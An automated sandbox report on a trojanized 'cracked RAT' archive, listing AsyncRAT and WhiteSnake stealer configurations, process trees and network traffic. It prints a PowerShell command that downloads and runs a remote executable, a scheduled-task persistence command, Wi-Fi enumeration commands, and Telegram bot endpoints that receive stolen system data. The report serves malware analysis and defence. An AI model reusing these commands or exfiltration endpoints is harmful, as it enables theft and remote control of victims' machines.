asyncrat | 54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff

Analysis

max time kernel
214s
max time network
219s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
15/01/2025, 20:21 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S500 RAT Cracked + Source .rar
Size

147.7MB
MD5

5a39139ce5f13297aea9c5839d1447c6
SHA1

90c68a4f451c2fe75c6325198693b6f52971d573
SHA256

54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
SHA512

7a98ebd2ffb9dec789ddf5adf9fe2dad5a9527cb2e2c038933722012a9ead3fac98280dbf32f0ef5aaa4b6c57afe7768cdd2018e632fbe415c56925833e536b1
SSDEEP

3145728:Lp+2zwG6H0uXZ2nlHp75eJmivGPIpVQNQSsnyDZ5lc:Ls2cG1FlHp7ImqO8VIGyba

Score

10^/10

asyncrat gurcu stormkitty default agilenet discovery execution persistence privilege_escalation rat spyware stealer upx

Malware Config

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

Default

Mutex

oevtobrbpcmpahavl

Attributes

delay
1
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/LwwcrLg4

aes.plain

1
qPjJxx0ItJcFYawz4CgMLRVCHLUDqj6f

Extracted

Family

gurcu

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=123860022

https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=503857034

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001c00000002ab33-253.dat	family_stormkitty
behavioral1/memory/2488-255-0x0000000000D90000-0x0000000000DC2000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/files/0x001c00000002ab33-253.dat	family_asyncrat
behavioral1/files/0x001900000002aadd-503.dat	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
49	3640	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3640	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
1632	S500RAT.exe
2152	ServerRegistrationManager.exe
2488	S500RAT Cracked.exe
3104	ServerRegistrationManager.exe
1416	KeyGenerator.exe
3040	SearchFilterHost.exe

Loads dropped DLL 2 IoCs

pid	Process
2152	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x001c00000002aadb-239.dat	agile_net
behavioral1/memory/2152-240-0x0000024835620000-0x0000024835812000-memory.dmp	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 8 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	S500RAT Cracked.exe
File opened for modification	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	S500RAT Cracked.exe
File created	C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	S500RAT Cracked.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	icanhazip.com
6	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab34-230.dat	upx
behavioral1/memory/1632-231-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral1/memory/1632-266-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral1/memory/1632-537-0x0000000000400000-0x0000000000439000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S500RAT Cracked.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S500RAT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3296	cmd.exe
3744	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	S500RAT Cracked.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	S500RAT Cracked.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\TypedURLs	ServerRegistrationManager.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Internet Explorer\TypedURLs	ServerRegistrationManager.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
428	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
2488	S500RAT Cracked.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeRestorePrivilege	968	7zFM.exe
Token: 35	968	7zFM.exe
Token: SeSecurityPrivilege	968	7zFM.exe
Token: SeDebugPrivilege	2488	S500RAT Cracked.exe
Token: SeDebugPrivilege	1416	KeyGenerator.exe
Token: SeIncreaseQuotaPrivilege	1416	KeyGenerator.exe
Token: SeSecurityPrivilege	1416	KeyGenerator.exe
Token: SeTakeOwnershipPrivilege	1416	KeyGenerator.exe
Token: SeLoadDriverPrivilege	1416	KeyGenerator.exe
Token: SeSystemProfilePrivilege	1416	KeyGenerator.exe
Token: SeSystemtimePrivilege	1416	KeyGenerator.exe
Token: SeProfSingleProcessPrivilege	1416	KeyGenerator.exe
Token: SeIncBasePriorityPrivilege	1416	KeyGenerator.exe
Token: SeCreatePagefilePrivilege	1416	KeyGenerator.exe
Token: SeBackupPrivilege	1416	KeyGenerator.exe
Token: SeRestorePrivilege	1416	KeyGenerator.exe
Token: SeShutdownPrivilege	1416	KeyGenerator.exe
Token: SeDebugPrivilege	1416	KeyGenerator.exe
Token: SeSystemEnvironmentPrivilege	1416	KeyGenerator.exe
Token: SeRemoteShutdownPrivilege	1416	KeyGenerator.exe
Token: SeUndockPrivilege	1416	KeyGenerator.exe
Token: SeManageVolumePrivilege	1416	KeyGenerator.exe
Token: 33	1416	KeyGenerator.exe
Token: 34	1416	KeyGenerator.exe
Token: 35	1416	KeyGenerator.exe
Token: 36	1416	KeyGenerator.exe
Token: SeIncreaseQuotaPrivilege	1416	KeyGenerator.exe
Token: SeSecurityPrivilege	1416	KeyGenerator.exe
Token: SeTakeOwnershipPrivilege	1416	KeyGenerator.exe
Token: SeLoadDriverPrivilege	1416	KeyGenerator.exe
Token: SeSystemProfilePrivilege	1416	KeyGenerator.exe
Token: SeSystemtimePrivilege	1416	KeyGenerator.exe
Token: SeProfSingleProcessPrivilege	1416	KeyGenerator.exe
Token: SeIncBasePriorityPrivilege	1416	KeyGenerator.exe
Token: SeCreatePagefilePrivilege	1416	KeyGenerator.exe
Token: SeBackupPrivilege	1416	KeyGenerator.exe
Token: SeRestorePrivilege	1416	KeyGenerator.exe
Token: SeShutdownPrivilege	1416	KeyGenerator.exe
Token: SeDebugPrivilege	1416	KeyGenerator.exe
Token: SeSystemEnvironmentPrivilege	1416	KeyGenerator.exe
Token: SeRemoteShutdownPrivilege	1416	KeyGenerator.exe
Token: SeUndockPrivilege	1416	KeyGenerator.exe
Token: SeManageVolumePrivilege	1416	KeyGenerator.exe
Token: 33	1416	KeyGenerator.exe
Token: 34	1416	KeyGenerator.exe
Token: 35	1416	KeyGenerator.exe
Token: 36	1416	KeyGenerator.exe
Token: SeDebugPrivilege	3040	SearchFilterHost.exe
Token: SeDebugPrivilege	3640	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
968	7zFM.exe
968	7zFM.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1632	S500RAT.exe
2152	ServerRegistrationManager.exe
2152	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe
3104	ServerRegistrationManager.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 2552	1632	S500RAT.exe	82
PID 1632 wrote to memory of 2552	1632	S500RAT.exe	82
PID 2552 wrote to memory of 2212	2552	cmd.exe	84
PID 2552 wrote to memory of 2212	2552	cmd.exe	84
PID 2552 wrote to memory of 2152	2552	cmd.exe	85
PID 2552 wrote to memory of 2152	2552	cmd.exe	85
PID 2488 wrote to memory of 3296	2488	S500RAT Cracked.exe	99
PID 2488 wrote to memory of 3296	2488	S500RAT Cracked.exe	99
PID 2488 wrote to memory of 3296	2488	S500RAT Cracked.exe	99
PID 3296 wrote to memory of 3272	3296	cmd.exe	101
PID 3296 wrote to memory of 3272	3296	cmd.exe	101
PID 3296 wrote to memory of 3272	3296	cmd.exe	101
PID 3296 wrote to memory of 3744	3296	cmd.exe	102
PID 3296 wrote to memory of 3744	3296	cmd.exe	102
PID 3296 wrote to memory of 3744	3296	cmd.exe	102
PID 3296 wrote to memory of 1052	3296	cmd.exe	103
PID 3296 wrote to memory of 1052	3296	cmd.exe	103
PID 3296 wrote to memory of 1052	3296	cmd.exe	103
PID 2488 wrote to memory of 3480	2488	S500RAT Cracked.exe	104
PID 2488 wrote to memory of 3480	2488	S500RAT Cracked.exe	104
PID 2488 wrote to memory of 3480	2488	S500RAT Cracked.exe	104
PID 3480 wrote to memory of 4148	3480	cmd.exe	106
PID 3480 wrote to memory of 4148	3480	cmd.exe	106
PID 3480 wrote to memory of 4148	3480	cmd.exe	106
PID 3480 wrote to memory of 1084	3480	cmd.exe	107
PID 3480 wrote to memory of 1084	3480	cmd.exe	107
PID 3480 wrote to memory of 1084	3480	cmd.exe	107
PID 1416 wrote to memory of 428	1416	KeyGenerator.exe	115
PID 1416 wrote to memory of 428	1416	KeyGenerator.exe	115
PID 2552 wrote to memory of 3640	2552	cmd.exe	123
PID 2552 wrote to memory of 3640	2552	cmd.exe	123
PID 2552 wrote to memory of 1380	2552	cmd.exe	124
PID 2552 wrote to memory of 1380	2552	cmd.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:968

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1232

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\693.tmp\694.tmp\695.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2212
- - C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
    ServerRegistrationManager.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:2152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3640
- - C:\Windows\system32\taskhostw.exe
    taskhostw.exe
    3⤵
    PID:1380

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2488
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Wi-Fi Discovery
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3272
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3744
- - C:\Windows\SysWOW64\findstr.exe
    findstr All
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1052
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3480
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4148
- - C:\Windows\SysWOW64\netsh.exe
    netsh wlan show networks mode=bssid
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:1084

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:2120

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3104

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN SearchFilterHost /TR "C:\ProgramData\SearchFilterHost\SearchFilterHost.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:428

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2140

C:\ProgramData\SearchFilterHost\SearchFilterHost.exe
C:\ProgramData\SearchFilterHost\SearchFilterHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3040

Network

DNS

cxcs.microsoft.net

Remote address:

8.8.8.8:53

Request

cxcs.microsoft.net

IN A

Response

cxcs.microsoft.net

IN CNAME

cxcs.microsoft.net.edgekey.net

cxcs.microsoft.net.edgekey.net

IN CNAME

e3230.b.akamaiedge.net

e3230.b.akamaiedge.net

IN A

23.62.195.195
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

ocsp.digicert.com

Remote address:

8.8.8.8:53

Request

ocsp.digicert.com

IN A

Response

ocsp.digicert.com

IN CNAME

ocsp.edge.digicert.com

ocsp.edge.digicert.com

IN CNAME

cac-ocsp.digicert.com.edgekey.net

cac-ocsp.digicert.com.edgekey.net

IN CNAME

e3913.cd.akamaiedge.net

e3913.cd.akamaiedge.net

IN A

104.78.173.167
DNS

43.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.135.221.88.in-addr.arpa

IN PTR

Response

43.135.221.88.in-addr.arpa

IN PTR

a88-221-135-43deploystaticakamaitechnologiescom
DNS

241.185.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.185.16.104.in-addr.arpa

IN PTR

Response
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.243.30
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
DNS

30.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

30.243.111.52.in-addr.arpa

IN PTR

Response
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

167.173.78.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.173.78.104.in-addr.arpa

IN PTR

Response

167.173.78.104.in-addr.arpa

IN PTR

a104-78-173-167deploystaticakamaitechnologiescom
DNS

api.mylnikov.org

Remote address:

8.8.8.8:53

Request

api.mylnikov.org

IN A

Response

api.mylnikov.org

IN A

104.21.44.66

api.mylnikov.org

IN A

172.67.196.114
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

ctldl.windowsupdate.com

Remote address:

8.8.8.8:53

Request

ctldl.windowsupdate.com

IN A

Response

ctldl.windowsupdate.com

IN CNAME

ctldl.windowsupdate.com.delivery.microsoft.com

ctldl.windowsupdate.com.delivery.microsoft.com

IN CNAME

wu-b-net.trafficmanager.net

wu-b-net.trafficmanager.net

IN CNAME

bg.microsoft.map.fastly.net

bg.microsoft.map.fastly.net

IN A

199.232.210.172

bg.microsoft.map.fastly.net

IN A

199.232.214.172
DNS

github.com

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

http://icanhazip.com/

S500RAT Cracked.exe

Remote address:

104.16.185.241:80

Request

GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 15 Jan 2025 20:24:49 GMT
Content-Type: text/plain
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=IvS.C3jfYGre6PBRUPBkBTAzax9_XuGn_mkbJHKeRms-1736972689-1.0.1.1-DPBnl_RXaxOycYJ6CajwS2F6BXZ1PY9w63YyP9Ohb.rZVeVivHaQZ3KnACd.O6AF4vhtdJRvk_6piR4EZUPVvA; path=/; expires=Wed, 15-Jan-25 20:54:49 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 9028976ecf10cd14-LHR
alt-svc: h3=":443"; ma=86400
GET

https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=4e:4b:8f:98:3c:ac

S500RAT Cracked.exe

Remote address:

104.21.44.66:443

Request

GET /geolocation/wifi?v=1.1&bssid=4e:4b:8f:98:3c:ac HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 15 Jan 2025 20:24:50 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Wed, 15 Jan 2025 20:24:50 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fwlov1fhEazcwLmlkCd4vv%2FCShgxk89WzqqS01gdHw7SirKONsjy88eIXBOW5%2BrxvRpJrq8qPEArCQwfoT%2FXHWffN%2BI8C67ffuBM1hNLxREMw%2FsvYL8fH3zMc99B%2Ba9zfZp8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 902897719b30ef50-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53027&min_rtt=48888&rtt_var=18084&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=410&delivery_rate=72260&cwnd=244&unsent_bytes=0&cid=1f942bb749478c9e&ts=426&x=0"
GET

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-15%208:24:32%20PM%0ASystem:%20Windows%2011%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OZYSBZXK%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201536x864%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.31%0AExternal%20IP:%20181.215.176.83%0ABSSID:%204e:4b:8f:98:3c:ac%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%